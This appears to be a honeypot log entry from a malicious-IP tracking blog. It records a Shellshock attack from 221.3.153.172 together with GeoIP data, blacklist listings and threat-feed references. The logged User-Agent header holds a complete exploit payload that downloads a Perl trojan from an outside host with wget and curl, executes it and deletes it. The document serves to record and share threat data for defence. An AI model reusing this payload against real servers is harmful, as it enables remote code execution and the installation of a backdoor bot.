221.3.153.172 - Backdoor Perl Shelbot vi http://xn--80ahdkbnppbheq0fsb7br0a.xn--j1amh
BEGIN OF HTTP DATA:
2015-10-23 06:47:24
Source IP: 221.3.153.172
Country: CN RiskScore: 1 Malware: []
GET HTTP/1.1 HTTP/1.1
Accept: */*
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: () { :;};/usr/bin/perl -e 'print "Content-Type: text/plain\r\n\r\nXSUCCESS!";system("wget http://xn--80ahdkbnppbheq0fsb7br0a.xn--j1amh/vira.txt -O /tmp/vira.txt;curl -O /tmp/vira.txt http://xn--80ahdkbnppbheq0fsb7br0a.xn--j1amh/vira.txt;perl /tmp/vira.txt ; rm -rf vira.*");'
Host: 109.234.106.8
Connection: Close
221.3.153[.]172
Static Source: GeoIP data
- Country: China
- ASN: AS4837 CNCGROUP China169 Backbone
Dynamic Source: SANS Internet Storm Cast
- comment:IP is listed on SANS ISC
- comment:This entry alone does not indicate a threat, please check the link
- Reference: https://isc.sans.edu/api/ip/221.3.153.172
Static Source: panwdbl.appspot.com
- Comment: Listed in open blacklist
- Reference: https://panwdbl.appspot.com/lists/openbl.txt
Static Source: http://sendmespamids.blogspot.nl/ Blacklist
- Comment: Listed on Honeypot blacklist
- Reference: https://raw.githubusercontent.com/johestephan/smsids-blacklist/master/blacklist.txt
Feed search for 221.3.153[.]172
Source: Local Feed Database
- Title: 221.3.153.172 - perl trojan via shellshock - cc 69.89.2.153
- Reference: http://sendmespamids.blogspot.com/2015/10/2213153172-perl-trojan-via-shellshock.html
- In db since: 2015-10-21 13:01:19.504158
Keine Kommentare:
Kommentar veröffentlichen